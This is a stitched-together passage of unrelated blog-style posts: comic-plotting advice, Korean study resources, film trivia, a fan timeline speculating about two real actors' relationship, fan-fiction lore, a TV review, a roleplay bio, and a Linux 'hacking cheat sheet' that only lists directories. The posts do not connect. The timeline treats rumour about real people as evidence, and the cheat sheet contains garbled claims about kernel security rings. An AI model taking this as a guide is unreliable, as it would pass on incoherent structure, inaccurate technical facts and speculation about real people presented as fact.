but onto my real question. mx kendra when you are developing your original story, what process do you go about designing characters + outlining plot, etc? is it in random bits and pieces or do you try to plan it out chronologically? im not very talented at constructing stories but i do have a few OCs and ideas, but i feel overwhelmed by the idea of planning everything out. i know i ultimately need to sit down and write but i would love some advice or insight if you have any! thank you!

but omg planning a whole story is SO overwhelming. i developed all my stuff in bits and pieces so trying to organize everything has been so daunting BUT not too long ago i became determined to get everything down and i found some youtube videos that really got me together. im doing a comic and struggled with taking the oc lore in my head and merging it into the chronological story i want to tell. bc i have sooooooo much background on a character but that background may not come out until way later in the story u know? and then bc my lore is in prose but the final content would be visual right? so i did some digging and stumbled upon this video!

basically her process is writing everything down in a story format. like just write every detail that comes to mind then create ANOTHER document where u take your prose and start breaking it down into a script like format adding in a bunch of visuals u want and THEN you storyboard from the script. it made a lot of stuff click

and then i edited the process to work for me as someone who's super scattered w my lore. so what im doing now is taking where i want my story to start and just writing. and as each character or story detail is introduced i go to a special section of the document called notes and write out a random bit of lore associated with that. and i'll even write out future events i know i want to happen so when i get to them in the actual chronological story prose i can take what ive already written and insert it into the timeline

so for example when as im following one stream of conscious as to how i want the first chapter to open and i get to an oc's introduction i bold the oc's name and then make a section where i then dump all of the character history that bounces around in my head. and then i go back to the chronological story. and another thing that's helped is when im plotting my story when two characters have an interaction or a character has an interaction w something important that explains a bit of their character i write a breakdown on that moment in that point in time.

for the longest ive tried to do everything chronologically and only write something down once it comes up in the timeline but im accepting that it is NOT the best way for me to work 😭😭😭😭but its been soooooo nice to let myself run free. i'll write out a character's whole backstory in my random tidbit document and then sprinkle it in bit by bit in the chronological timeline document

and it really helps stave away the feelings of being overwhelmed/pressure to be perfectly organized as u write on the first go. ik my process is specifically for comics but even if ure writing a novel maybe this can be of some help 💖

My Top Korean Resources [2020 edition]

I have been discussing resources with a few people on private message and have been thinking a bit about what resources were the best on my journey.... so here’s my final (maybe) compilation of resources for the year that will hopefully be helpful for anyone who is looking at resources between the beginners and upper intermediate levels.

NB. This list is based off materials I have used in the past and is not an exhaustive list of ALL the resources I have used - it is just a selection of some of my favourite. There are so many Korean resources out there so there might be some that work more for you that I haven’t even looked at.

Course Texts

In my opinion, the perfect course text isn’t going to teach you everything you need to know, but a good course text will at least give you a clear framework to chunk up and guide your studies. I have used a few but the most user friendly one is definitely:

Talk To Me In Korean - they set things out clearly so nothing feels overwhelming and provide a sensible framework to follow for self-study. Other course books tend to be better suited for in-class settings and not great for self-study.

Grammar

The course texts will teach you about grammar but I think they don’t teach you how the grammar structures are related to each other. So I think it is key to look at one or more of these books:

Korean Grammar In Use: Beginners

Korean Grammar In Use: Intermediate

The above series is incredible and a serious MUST for all Korean learners. They clearly and concisely set out the grammar points and show how they are all related to each other. There is an Advanced book as well which I have yet to use and will teach quite complex structures.

Basic Korean: A Grammar and Workbook (I have linked the forthcoming version being released in Dec 2020!)

Intermediate Korean: A Grammar and Workbook

The above Routledge series is great for its workbook feature. The layout is a little academic so it’s not super appealing but the way they explain grammar is clear and relatively detailed. The number of examples included in the workbook is fantastic, providing a lot of opportunity to practice. I haven’t used the Basic book but if it is anything like the Intermediate, it will be a winner.

Vocabulary

The part that people often miss out when learning Korean is vocabulary, because it can be so easy to just follow course texts and grammar books, but those will never teach enough words. To learn more vocab, it is really important to read around. There are so many Korean language books that you can pick up, but here are some books and resources that are catered specifically for language learners that I have loved:

Korean Culture in 100 Keywords - they give a paragraph on different cultural aspects of Korea in both Korean and English and highlight all the new vocabulary for you. The texts are graded from easy to more difficult.

News in Korean - lots of short news stories with translations in English and comprehension questions. Might be targeted more at intermediate learners

Mind Map TOPIK VOCA 2300 - this book sorts vocabulary into categories and shows them as mindmaps. It also gives readers sentences in context and has mini quizzes, HOWEVER it is written in 98% Korean so this is a book that is definitely more pitched at upper intermediate levels and above and teaches vocabulary that is a little less common 

Anki - my most used resource. Everyone has their own favourite for flashcards and this is mine. Anki do spaced repetition meaning that it will constantly test your knowledge on vocabulary, spacing the quizzes/tests depending on how difficult you find the word. It is more efficient than other flashcard platforms, but it is a little tricky to get started and create your own cards. If you want to download pre-made decks, you can, but this works best when you add the words you have learned yourself so that you get decks that are full of vocab that is relevant for you

Beelinguapp - This is an app that has some story books written in both Korean and English. It also has an audio function so you can listen to someone reading the stories in Korean. This is neat for pronunciation and listening, and also identifying new words, however the range of stories are limited.

Gloss - Gloss have a set of online lessons pitched at different levels which takes you through articles or texts (or audio and video), then asks a lot of comprehension questions. It follows a lesson format so it is far more engaging than your regular book, however it is a little on the difficult side.

[EXTRA] Your First Hanja Guide - you might not want to learn vocabulary this way and it is absolutely NOT an essential, but for me it is helpful to visualise the Hanja character when seeing the relationship between words, so if you like learning words like that, then this is the book for you

Listening / Watching

Like with reading, there are multiple resources that you can use to listen to native Korean, but here are some that are specifically targeted at learners

여보세요 - this app/website has a few short video clips and goes through slowly to examine the meaning and new words, then has a number of test quizzes through multiple choice or through speaking (via microphone). There are different clips graded by levels and the app tracks your progress and gives progress reports.

Real Life Korean Conversations: Beginners / Intermediate - this IS a book, but it is best used in conjunction with the audio files. The book gives the script, as well as the vocabulary, and also looks at key grammar points and structures used in the conversations

Speaking

There aren’t many resources that I find great for self-studying speaking - generally you need someone else to do that with you, but here is one that I thought was quite neat:

Teuida - I just did a very quick run through this app as it is definitely pitched at beginners, but I thought that it was a smart way of learning some basic conversational Korean. It teaches you phrases and you have to repeat them back through the microphone feedback function. Then to test your retention, they take you through a mock situation and you have to speak your answers - there is quite a strong focus on getting pronunciation correct. My biggest downsides of this app are that the free sections are really limited, AND they seem to have geared the lessons towards the idea of dating, which I just find so awkward and embarrassing hahaha!

Writing

I’m in the market to buy some writing books and have my eye on some but am waiting until I have the time to work on them, but this book is quite neat for learning different sentence structures and how to construct meaningful answers:

Korean Q&A Sentence Patterns - this book poses a question and looks at different ways of answering it. It also shows variations of the question, then examines form. It gives an example long answer and prompts you to think about how to construct your own response using the grammar and vocabulary given

- they also had to have a snake wrangler come out before they shot that scene and he was like “uhh i think it’s good?”

- andy was excited about having to get shot by an arrow when he was reading the script (it was also the moment they realised this movie was zanier than first thought)

- they started working on palm springs on november 9th 2016…. hence the wedding date

- cristin said they did about 30 takes (at least) of her opening her eyes/sitting up.. basically the entire first half of the first day shooting she spent doing the same thing

- the dinosaurs bit was a “symbolic moment between the characters - they are 2 people who don’t believe they can be loved so they’re feeling something impossible and therefore they should see something impossible”

- the wake-ups were like an acting exercise in a way bc each wake up was diff emotionally based on where they were in the loop

- nyles finally cares about something (her) for the first time in maybe hundreds of years and he immediately gets slapped down :(((

- cristin doesn’t want to know if nana knows bc the mystery of it is what makes the movie so great!

- andy said there’s no definitive answer to a lot of stuff bc a lot of the people working on the movie had diff opinions

- the french song w the slo mo bit of sarah in the bar was cristin’s choice

- andy is v confused why people think spuds is nyles’ dad,, he’s just tricking him into getting a ride and andy’s sorry to everyone who thought it was real

- cristin liked that the payoff at the end felt like payoff while still staying true to who nyles and sarah are and not just super romantic bc “it’s a romcom!” [andy said throwing his arms in the air]

- cloudbursting was andy’s idea from the very first meeting about the movie but we been knew

- andy: “here’s the ending! nobody knows what it means!”

- the family at the end was the producer’s family, they drove a very long way to do that 2 second scene lol

- andy and cristin were swaying to when the morning comes at the end 🥺

A Love Story in 3 parts.

Why the month of June is always very interesting. basically an excuse to try making a timeline of 1 month spanning three years before I attempt to do the 2017-2020 timeline. the keyword there is ATTEMPT.

﹌﹌Part I:  June 2018 ﹌﹌

This is a popular guess on the month that they actually got together— as far as acknowledging that they’re NOT bros. Keep in mind that these two supposedly first met on 3/14/2017 with no interactions or even eye contact ( as per Web). After that, they meet again 4/2018 as CQL started shooting. 

That’s two months of interaction. We have different timelines in our head with them, so you can interpret this as A.) they hit it off really quickly that’s why it only took a little time for their feelings to go THERE. B.) they are lying liars who lie and have been in contact from 2017-2018.

• 6.2.2018 - Shooting of LWJ and WWX in the rain.  • 6.3.2018 - Produce 101 Performance! Yes, the same one where GG was a mentor and they acted like they didn’t know each other. Famous for moments such as:

Glancing at each other even if separated by people. +  Sharing an earpiece. GG smiling while watching Web Dance.

Here is the whole episode 

• 6.3.2018 - TTXS episode airing where Web gives love clues, where he says it depends on how he feels. Also that when he’s 40, he wants a kid and a dog. 

• 6.9.2018 - GG’s interview with him showing how much of a Libra he is. 

• 6.10.2018 - TTXS episode airing where Cheng Xiao is a guest and she proceeds to be Web’s good bro by exposing him ; saying he’s a Monk. 

• 6.11.2018 - Interview with Popular highlight, Web mentions GG for the first time while looking THIS good. The Audacity. Honestly. 🤦🏻‍♀‍

He talked about how long GG’s lines are compared to him, especially when they highlight it on their script books. 

• 6.14.2018 - Shooting of Cold Pond Cave scene ; Then clinging to each other amidst the cold water. If you watched the new BTS from fansites, there is a 🔞scene here. Pertaining to the M*gnum W*ng. 

• 6.16.2018 - Shooting guns at each other and dancing to Black Pink’s Ddu Ddu.

• { VERY IMPORTANT DATE} 6.18.2018 is when they shot this scene. GG is looking all wet, with mud on his face but Web just says he still looks handsome with no make up on. Also, CAN WE TAKE A SECOND AND WEEP at how GG looks at Web here. His eyes. Wow. He clearly adores Web at this point.

• They also shot WWX handing Zongzi to LWJ.

• Later that day, they ate together. They were photographed by paps who thought Web was going out with a girl. The produced and director of CQL was also there.

• GG then posted this on Weibo on 20:18 “love you yibo” as a greeting for the Festival. Web took the picture, according to me. I’m the curtain.

• 6.19.2018 - The next day, Web is photographed at the airport with the same clothes. This is also the first appearance of his white Nike Bag. He had to go and film an episode of Happy Camp.

• 6.22.2018 - a supposedly important day too as they cued 622 a couple of times. This is a good read on that.

• {VERY IMPORTANT DATE} 6.19.2019 - First appearance of Web’s ox head necklace via a picture of him in an airport, at Chongqing. 

• 6.19.2019 - GG posts an ad for Qeelin on his instagram account. ( which is now non existent since it was hacked incase you didn’t know). Qeelin Bo is significant to BJYX, you can check it on my jewelry post. 

• 6.21-6.22 2019 - Web posted himself practicing skateboard. 

• 6.25.2019 - They both posted on their Weibo about their joint Bazaar Magazine cover. This was re-released and became bazaar’s #1 e-magazine issue.

• 6.27.2019 - They both post about the premiere of CQL! 💚❤️

• 6.28.2019 - Web posts himself as LWJ, saying rabbits are cute. 

• 6.30.2019 - Web attends Yuehua annual party as Spiderman (into the spider verse).

• 6.5.20 - GG posts after a long time of silence with a picture of blue sky. Captioning it with : “Blue skies and white clouds, what do you see?” more on the significance of blue sky and white clouds with BYX here.  • 6.9.20 - XZ studio posts a video about GG’s daily life, giving us a glimpse of what he was doing. • 6.12.20 - We finally get a selfie from GG! He mentions on his caption that his hair is getting long. There is a CPN on this that the shirt he is wearing is a couple shirt from trasher which matches Web’s. Also, as people match the scenery posts on this, it matches with Web’s filming locations. 

• 6.13.20 - GG Douyin update, making orange juice like a pro. CPN on this is that the place he is filming at is pretty similar to Web’s house. But let’s not go there. 

• 6.18.20 - Another artwork post from GG. 

• 6.20.20 - Himalaya releases a CF for their new endorser, Wang Yibis. THIS CF ANS EVERYTHING ABOUT IT KILLED US. Starting with Web’s post,  “Some words, even if I don’t say it, u guys will know. This is our tacit understanding. Love is like this. Accompanying everyday.”

• 6.21.20 - Web video doing an Ollie (skateboard trick). People were speculating where he actually is on this one. most probably just him enjoying his down time and probably Lele taking that video.  • 6.25.20 - GG posts an artwork of zongzi along with an actual one for dragon boat festival. People have analyzed the little drawings and noted one looks like him & the other as Web. 

• AND FINALLY, this year’s Dragon Boat Festival gave way to the crazy fake rumor of them getting “engaged” + buying a house and car. When this came out, it was such a sweet fanfic— but with how the fake rumors becoming true lately— this is now very scary 👀.

CPN is that they spent this year’s Dragon boat festival together because of this clue. (Let me copy my own post) -->> 

This started with GG’s post and the background being compared to one of Web’s cast-mate, Wang Hao Xuan.

What gets me is the caption saying, “stuff that happens at work is a secret”. / “someone became super talkative while eating zongzi” What? Why? Who do we know is quiet but becomes really talkative when with his GG? WANG YIBIS.

Post-shoot, The director attended SDOC 3 finals too! To support Web. Plus Web’s message for the wrap was sweet. I felt like they really took care of him and will not say anything that will bring him down.

(idk why but id kinda like riley to be portrayed more sympathetic instead of “psycho killer” like she had a mental break due to the stresses of needing to be perfect n i feel like that gets overlooked sometimes)

i also think there could be some well done foreshadowing but i dont know how i would impliment it atm kfdfkj but the actual show does it well anyway in the script,, possibly add some visual foreshadowing for the tv show

like on the one hand i can see why Ursus would think that maybe Gwyn would be better off not remembering, but also making him forget clearly didn’t actually help him suffer any less, it just gave him a different kind of suffering. He’s wrung-out tormented and Ursus can’t/won’t help him because of the potential repercussions of Gwyn learning the truth. which do include some Worst Timeline options for how that could go but. also include a few Gwyn’s Able To Move On And Live Well, With Or Without Ursus options so.

idk i just feel like after a certain point of seeing how Gwyn’s basically falling apart over all this Ursus really should’ve considered having that difficult Discussion bc that boy was Not getting better on Ursus’ Plan A

i mean genuinely tho Ursus is so desperate to forget/bury/escape/move on from the past but in adopting Gwyn and trying to be a family and a fresh start for him...that shut down any chance of that actually happening.

The AU crash course: The premise behind the au is that everything takes place in a pocket dimension controlled by a black magic script. Joey Drew is the one who’s writing/editing this script, and his rewrites affect the world and the characters within it. His constant reshaping eventually twists the world from a sitcom genre to a horror film- hence the horror esque setting, creatures, and plot. The characters didn’t escape the rewrites’ effects either. They’re warped into corrupted versions of themselves. However, these characters end up becoming sentient after awhile. The first one of these to become entirely sentient is Henry. He’s currently the only one who’s all the way out of alignment. A toon gone rogue, if you will. He still goes along with Joey’s “plot,” but it’s more so he can try to reach the other characters than to keep Joey happy or unaware of his actions. His goal is to basically “wake up” the other characters, so they can all stop living in a hellish nightmare studio and actually try and make something nice out of their home. He’s extremely dedicated to his goal.

FAQ: 

How many of the employees are gonna show up? Hopefully all the named ones in the game! Once they’ve got a design, they’re guaranteed to show up somewhere.

Are they really carbon copies of the employees? Is there nothing different about them and their irl counterparts? They started as carbon copies! Latching onto their old traits and their old selves does help them come to their senses. However, different character development happens in script than IRL, so they end up different. Henry, for example, takes up the last name “Ross” when he wakes up (instead of his IRL counterpart’s “Stien”) to differentiate himself :0

So is everyone corrupted on purpose? Yes and no. Yes, because Joey chose to rewrite the script so much that it mangled characters, but no, because he didn’t intend to mangle them in the first place. It just kinda happened.

What makes them corrupted? Corruption is what happens when you can’t hold onto the core of what your character is, and get dragged into what the new script is telling you. It’s when you lose sight of who you are among all the chaos. People who are drawn farther away from their actual selves end up more monstrous. Susie (aka “alice” angel) is a great example of this. Bendy is too! Far be it from his real nature to be a murderous monster.

So can the toons be uncorrupted? Yup! Henry’s our model citizen this time. He looks more like a toon than a normal person, sure, but there’s nothing monstrous about him. That’s because he’s latched onto what makes him Henry. He’s not letting the instability of the world around him shake him up. Otherwise he’d be a goopy mess of ink.

Why’d Joey write everyone so differently that they corrupted? He’s actually very out of touch with people once he starts rewriting the script. Since his memories are getting foggy, he fixates on details that he can remember, and exaggerates them as needed. In fact, he’s hidden tape recorders around the script studio as built in reminders of these character traits.

How’d Henry wake up? And how does he plan on waking everyone else up? Ok… this is a longer answer. It all comes together, i promise. Jus hang with me. Whenever henry dies, he gets sent back to a sort of “first draft” stage. In order to get back to the world he’s supposed to exist in, he has to get through all the layers of ink Joey put down to get to his current script. As one can imagine… there’s a lot. So much so that Henry has to essentially swim to the surface. As he passes through all this ink, he can hear whispers of previous scripts. The deeper he is, the closer these whispers are to what the world used to be like. Seeing as Henry is the protagonist, he ended up dying… a lot. Like, a lot a lot. Joey had a lot of snags in the script to work out. All these times sent into the draft-y ink soup made made Henry slowly realize what was going on. He wasn’t mindless anymore. He knew what was up. After realizing that the world wasn’t right, it didn’t take him long to push for the rest of his consciousness. He plans on using what whispers and memories he can gather to bring everyone else back. He’s not dying on purpose, mind you, but he gathers as much information as he can to help everyone else realize that they’re not who they’re supposed to be.

Wait, memories? Does Henry remember the past scripts now? Not quite? He’s got a good enough memory stockpile to keep himself centered, but he doesn’t always know what’s up ahead as he heads through another studio loop. If Joey happens to rewrite or change around the script, those patches of Henry’s memory blip out of existence. Or at least get hazy. Hen can often tell if Joey’s changed something by how many holes he has in his memories.

Can anyone in the pocket dimension get out? Henry’s the only one who can get out! Joey literally wrote him a back door to the script. It used to be so he could talk to Henry whenever the “story” was over, but nowadays it’s just to judge how fast plot goes via how quickly Hen gets back. All Henry can manage to do is walk around and stare silently. And he can’t even stay out very long. Ink’s unstable in the real world. Gotta go back in n start the horror show over if u wanna live :/

Can Joey go in? Nope! Since he’s not made of ink, he can’t go in. He can watch tho!!! He does so via writing POV shifts into the script, and watches through whatever character it shifted to. Who needs cameras when u got the eyes of black magic toons n inky monsters ᕕ( ᐛ )ᕗ

Does Joey know Henry is sentient now? Nnnnot quite? He thinks the magic is being screwy with him. He can’t switch POV to Henry anymore, since the toon’s taken control of himself, and that’s real confusing since the writer doesn’t know what’s up. Plus, like mentioned above, Hen can’t exactly give Joey a sign once he gets out of the studio. Bummer :/

Is Joey gonna majorly rewrite the script any time soon? Nope. He’s to attached to his current plot to change the genre or anythin, so it’s gonna stay as is. With some changes here and there. One musn’t underestimate how many times u can change the order of scenes, or improve dialogue... 

AU Background:

Y’all probably wanna know how this whole horror show started. I’ve got two words for ya: Joey Drew. Unsurprising! But he’s our starting point nonetheless. Joey Drew is the retired owner of Joey Drew Studios, a cartoon studio that ran itself into the ground after a decade or two of fantastical cartoons. Money problems aren’t kind to the entertainment industries. However, the studio was still his pride and joy! As are the friends who stuck by him or met him during the time it was open. He kept up with all of them through the years. They were like a little family. Unfortunately, time has a way of changing things. With his friends drifting away, living their own lives, getting up in years, or a combination of the three, Joey wasn’t doing too well. He was lonely. Feeling washed up. Missing the glory days, where he helped work on cartoon scripts instead of submitting horror and mystery shorts to local magazines. Not all that surprising that he turned to something else to cope. This thing being none other than occult magic. Because… of course it is. It’s a habit he’s had for years. Nothing like some demonic rituals to spice up the life of the creative mind behind kids’ cartoons! Especially fun when you’re a man with poor impulse control and a wild imagination. In any case, Joey summons the three main characters of his beloved cartoon series. Bendy, Alice, and Boris! (I refer to these three as the “toon trio.”) He was just as happy that he’d managed to bring them to life as he was to have them around the house. It was like having slightly unruly grandkids with toony superpowers. In other words, they were absolutely delightful!!! He took care of them and admired their antics. It was a great time. … until. Well. It wasn’t. Turns out things that don’t belong in this world get rejected eventually. After a few months, things started go go wayward. The toon trio had difficulties maintaining their forms, moving, engaging in tropes, and a ton of other things. They were miserable. Joey was understandably heartbroken to see this happen to his poor toons. So, like any good person, he tried to do the right thing: put them back on the paper they came from. It didn’t end up working exactly how he’d expected. Everything comes with a price when you mess with demonic ink. The magic not only created a stack of paper instead of a series of drawings, but latched onto an old fountain pen and Joey’s closet. If the closet thing seems odd, it is. But it’s a convenient place to hide ritual pentagrams! So, closet it is. Upon frantic examination of the papers, Joey discovered it was a script. A black magic infused script. Three names up top told him the toon trio were the only characters. A bit of experimentation led him to discover that the magic-infused pen was the only thing that could interact with the script properly. Further experimentation showed him that the script had made his closet into a pocket dimension. The contents? Whatever was in his new script. This is where the real fun begins. The new magic script practically floored Joey with awe. He had a world he could shape however he wished! He could run all those scripts he’d never gotten to put in production! He could watch his toons frolick! He could even use it to play with ideas he’d never gotten to explore. The possibilities were endless! 

((Of course, you might be wondering if Joey… y’know. Knew the toons were still alive. Because they were, they were just living in a pocket dimension now. In short? No. He didn’t. He carefully tested a few things with the script, just to make sure. All the toons did was what he wrote down. They moved like they were alive, but didn’t act that way. Plus, the dimension made them blank slates. They didn’t have any characterization in there to make them truly alive. So! For all intents and purposes? He saw them as you would any other character you write. A visual extension of his imagination. Ok mini rant over, back to the story--))

Playing with the toons was amazing. Joey hadn’t had fun like that in years! It was his little secret world, populated by his cherished toons. He could make believe whatever he wished. Eventually, though, loneliness started to catch back up to the old man. His friends… his family… life… it all went on. He just felt left behind. And what does Joey do when he doesn’t feel good? Not cope healthily, that’s for sure. Onwards to more occult magic! Only this time, he tries something… different. The toons were lonely. They deserved company. They deserved someone to take care of them. A familiar face. Maybe someone who helped Joey create them in the first place. Someone who’d just sent Mr. Drew an old letter and a card, since he hadn’t seen him in awhile… … someone like Henry. Using the magic pen, Joey traced over Henry’s note. Far from ruining the precious letter, it transferred “Henry” into the script. It’s not the real one! Basically a carbon copy, fresh from the time period that Hen first wrote the note in. Seeing as Henry’s letter came from around the time the cartoon studio was going strong, it’s an old version of him. But it was still Joey’s old friend. Just… toony. Toon Henry reacted just as his living friend would. If he wrote dialogue? He spoke it like Henry would. If he wrote some action? The toon put a classic Henry twist on it. Delighted, Joey returned to his script with renewed vigor. Toon Henry got to spend plenty of quality with the toon trio as the days went on. Thus began a trend of toonification. Missing one of his old friends? All Joey had to do was grab something with their old handwriting on it, and trace them into the script! There’s a carbon copy that acts just like the real deal! A fine compromise, right? … Right? Not exactly. It was fine at first. Joey made what could probably qualify as a sitcom-style story for the toony world to run on. His friends, at this point, all populated the studio. The premise was that the toons (now including the butcher gang!) had been summoned while he was still running the studio, and got up to hijinks with the rest of the employees. A hefty dose of actual studio drama- turned comedic, of course- kept the whole thing almost real. Joey even featured himself once or twice, but only in allusions, or a disembodied voice. He wasn’t about to let a carbon copy of himself have all the fun. It made him feel less lonely. More included. A fantasy world of never ending fun and heartwarming moments. How unfortunate it is that life doesn’t follow this pattern. Morality is a hard thing to come to terms with. So is sickness. Especially that of a friend. … it was just one rewrite at first. One alteration on a bad day. After all, using writing to cope is perfectly acceptable. One bad episode in the midst of sunshine doesn’t discount it all. One uncanny occurrence, though, doesn’t usually stay singular. It didn’t take long for the solitary rewrite to become two rewrites. Then three. Four. Six. Ten. Twenty. Fifty. More and more and more. Until the happy honey colored studio slipped into sinister sepia. This wasn’t the old script anymore. Not by a long shot.

The setting? A studio of shattered dreams.   Your protagonist? Henry. His goal? Survive long enough to escape.

gabriel was amusing. like.. i’m glad he wasn’t in the book. but he was great here. also really like michael and uriel. uriel was so damn beautiful.

i also would really have liked to see a mention of the fact crowley and aziraphale are both agender and potentially asexual. not even a hint of it here. buuuuuut it guess i know from the book. so.

my favourite episode was of course episode 3 with crowley and aziraphale’s 6000 year backstory. especially the 1940s bit where crowley saved the books <3

this show was was less confusing than the book too. ugh it was done so well

we didn’t see where the soldier guy went when aziraphale zapped him away!!! in the book he reappeared safely back home and went out to see his family. to be fair i don’t know whether he died and went to heaven, but it was a nice thing to happen

and they took out the Them’s bully/rival gang, who was led by the third baby from the baby swap, and who won awards for his tropical fish. at least that’s what i remember. which meant the parallel about heaven/hell being rival gangs was lost here. but the parallel between the horsemen and the them was stronger than ever and i loved that.

look, i mean, 10 out of 10, EASY.

katherine mcnamara. genderfluid. they/them.  ／  rosalind cox just pulled up blasting fly by hilary duff — that song is so them! you know, for a twenty-four year old singer & actor, i’ve heard they’re really -capricious, but that they make up for it by being so +gregarious. if i had to choose three things to describe them, i’d probably say plaid shirts open with a white shirt underneath, thrift shop knick knacks, the smell of cinnamon, and childhood stardom. here’s to hoping they don’t cause too much trouble! ( vc: hilary duff, bridgit mendler & ana golja )

rosalind’s basically the same as they were the last time i played them, but i’ve edited a couple of things.  so here’s their new intro u know the drill like this to plot w them.  

rosalind’s 24, their birthday just passed at the beginning of the month.  

rosalind was born to laurel whittmore-cox on august fifth during a summer rainstorm.  rosalind’s father died months before their birth and they still to this day do not know much about him.  but they never minded.  their mom, and their maternal grandfather gus were more than enough.  

rosalind was “discovered” at the age of two.  they were at their mother’s office ( laurel’s a producer for movies & tv shows ) and it started a career for the redheaded baby.  mostly print ads for a while, a couple of tv shows and movies but nothing big.  that is until rosalind was nine years old and was cast as the titular role in disney’s lizzie mcguire.  and they dyed their hair blonde for the role. 

honestly, it was a dream.  rosalind’s mother was an executive producer and rosalind really loved playing lizzie.  it was her favorite thing.  she was excited to go to work every day.  her friends were great.  she loved her tv family.  and it was fun playing a role that really felt at home, as she was going through similar things as lizzie at the time of the show.  since rosalind was in middle school at the time when lizzie was airing.  

when rosalind was eleven years old ( and four months, not that that’s a needed detail ) they were going through this period of discovery.  figuring out who she wanted to be, as lizzie’s final season was filming.  they had just found music as an outlet and were working on writing and coming up with their own things, hoping to release something after lizzie ended.  

during this time rosalind read something and was watching a lot of television and something struck the blonde.  following research and time of discovery, rosalind found out about the term genderfluid.  and after reading about it and learning more.  it was like a lightbulb moment and they were like “this is it.  that’s me.”  and they decided to start using they/them pronouns because it felt right. 

rosalind told their family over dinner one night and while both laurel and gus were confused, they adjusted well.  it took laurel until rosalind was seventeen years old to finally not use “she/her” accidentally.  

but rosalind had this whole show riding on their shoulders and they just knew that this coming out was not going to be good.  people would talk and things would not end well for them, it could ruin the end of the series.  it was going to be a scandal, because it went against what the producers and execs wanted for their show’s star.  and, of course, lizzie was one of the number one shows on children’s programming right then too.  while everything was going on, still working on the final season, the problem was also that rosalind didn’t want to not use their pronouns because it’s who they are.  

so rosalind came out to the cast and the crew, to people whom they considered family.  it was a slow thing, not a big announcement, and people were mostly accepting.  by the end of the series filming, most of the people they worked with every day had adjusted to using the proper pronouns most of the time.   

rosalind thought they were finally free of the station and the pushy execs who only wanted their agenda pushed forward, other than working still with their record label for this music they had been creating.  but, as luck would have it, the producers and executives had gotten together to bring about a feature film for the show.  

and rosalind couldn’t say no, lizzie was still very much a part of who they were.  and getting to work with the people again ( even so soon after saying goodbye ) it was something they wanted to do.  

so after the small “break”, almost thirteen year old rosalind went off to italy to film this movie.  ( fact: they turned 13 while filming in italy ).

and while they were there with the cast and crew and people who loved and supported them, someone back home leaked their gender pronouns and caused a big stink.  

executives flew in when they were almost finished with filming and it was a big to do.  rosalind was scheduled to go on a tour after the film finished filming since their album was almost completed.  but the executives were nervous about what everything would be.  it was a lot of meetings and rosalind had to deal with the pressure of filming the movie and worrying about their own future and if the film they, and everyone else, worked so hard on would be released.  

the company did what they do best and decided that after the movie, rosalind should go on tour for their music right away.  so rosalind was rushed to a local studio to finish the final touches of the album, which was released before the film had finished.  

despite the immense pressure, rosalind was happy.  they were doing what they loved, writing music, acting, and singing.  

of course, going on a big tour meant rules and guidelines from the corporation.  a lot of them restricting what rosalind could say and talk about in interviews, which they had done before, but never to this same degree. now rosalind was completely restricted.  in fact, they had to read from a script and they had a personal handler from the company with them at all times. 

it didn’t help that they were touring for music on top of doing press for the lizzie film.  

it should have been the time of their life.  it really should have, but alas.  it was a time where rosalind was sleeping less and less every night and working on finding themself in the little spare time they had.  

it was building up a lot, taking a toll on the young teen.  

rosalind’s biggest personal problem with the press was that everyone who interviewed them was using she/her pronouns and completely ignoring the fact they’d even stated a preference for using they/them.  

it led to them having a bit of a …. MELTDOWN during an interview when they were asked a pretty terrible question.

footage went viral on tmz and mtv of rosalind pulling off their microphone in the middle of an interview, irate and yelling at who people later found out was their disney appointed handler,  “i’m sick of using the wrong pronouns for this bullshit! it’s not fair!”

the footage can still be found on multiple websites, and people tend to talk about it a lot still.  

the next thing they knew, the second half of the tour was cancelled, “creative differences” had been cited.  however, rosalind was still under contract with the record label, and even though they were basically blacklisted from working for quite some time, rosalind had to work on new music for a company that didn’t want them.  

rosalind released a second album soon after the end of the tour.  once their duties in the contract were finished and all obligations filled--rosalind left the company and went to “normal life”.  

the teen -- a redhead now, the blonde hair finally gone ( people called it shedding the disney baggage ) -- left los angeles to live with their grandpa gus outside of boston.  they maintained a job working at gus’ thrift/antique shop the little things.  and did their best to maintain a regular teenage existence.  which is hard when you spent your childhood on film.  

for a while, rosalind did a youtube channel in their later high school years.  sometimes they still post, but it’s sporadic if anything.  they used to do a lot of q&a videos.  they would often talk about working on music and talking about their gender identity and sexuality ( they’re pansexual ).  they wanted to have a voice for themselves, and doing something like that was the best way to do that. 

with everything, rosalind kept from saying anything outwardly bad about their old parent company.  people never understood why--when it was clear that they had been terribly unhappy and troubled at the old company.  

recently, rosalind has opened up about it.  they experienced a lot of wrongdoings from the company in their childhood, given the company’s outright display of their gender identity and how it didn’t fit with the image.  but rosalind still wished nothing but the best for the people whom they’d worked with.  there was nothing that the cast & crew had done wrong to them.  the people with whom they spent so many hours of their formative years were nothing but excellent and kind and hardworking people.  

they’re a people person, loving to be around other people.  but they’re also always a bit nervous about big crowds.  idk what it is.  one on one they’re amazing and chatty, but crowds make them nervous?  but stage stuff is wonderful? they can definitely hold themselves in a crowd or captivate a room.  

they’ve done a handful of made for television movies in the recent years.  recently they’ve released new music after a long period of nothing.  they did an extended play belong and a full length album then & now.  ( rosalind’s early music is canon hilary duff ie metamorphasis and hilary, which for rp purposes is called rosalind )

Hacking Cheat Sheets Part 3: Linux

Here is a little primer on some basic Linux, which is important for hacking

Linux Operating System

Identifying Users and Processes

INIT process ID 1 Root UID, GID 0 Accounts for services 1-999 All other users Above 1000

ring 0 in the security rings model, is where the kernel lies in linux ring 1 and ring 3 is where device drivers lie ring 3 is the users space and this is where init is and applications, etc.

init executes scripts to setup all non-os services and structures for the user environment. it also checks and mounts the file system and spawns the gui if its configured to do so. it will then present the user with the logon screen. init scripts are usually located in the etc/rc..../

</> is the root directory, this is where the linnux file system begins. every other directory is underneath it. do not confuse it with teh root account or the root accounts home directory

</etc> these are the config files for the linux system. Most are text files and can be edited

</bin> and </usr/bin> these directories contain most of the binaries for the system. The /bin directory contains the most important programs : shells, ls, grep. /usr/bin contains other applications for the user.

</sbin> and </usr/sbin> most system administration programs are here

</usr> most user applications, their source code, pictures,docs,and other config files. /usr is the largest directory on a linux system

</lib> the shared libraries (shared objects) for programs that are dynamicaly linked are stored here

* </boot> boot info is stored here. the linux kernel is also kept here, the file vmlinuz is the kernel

* </home> where all the users home directories are. every user has a directory under /home and its usually where they store all their files

* </root> the superusers (root) home directory

* </var> contains frequently changed variable data when the system is running. also contains logs (/var/log), mail ( /var/mail), and print info (/var/spool)

* </tmp> scratch space for temporary files

* </dev> contains all device info for the linux system. Devices are treated like files in linux, and you can read/write to them just like files (for the most part)

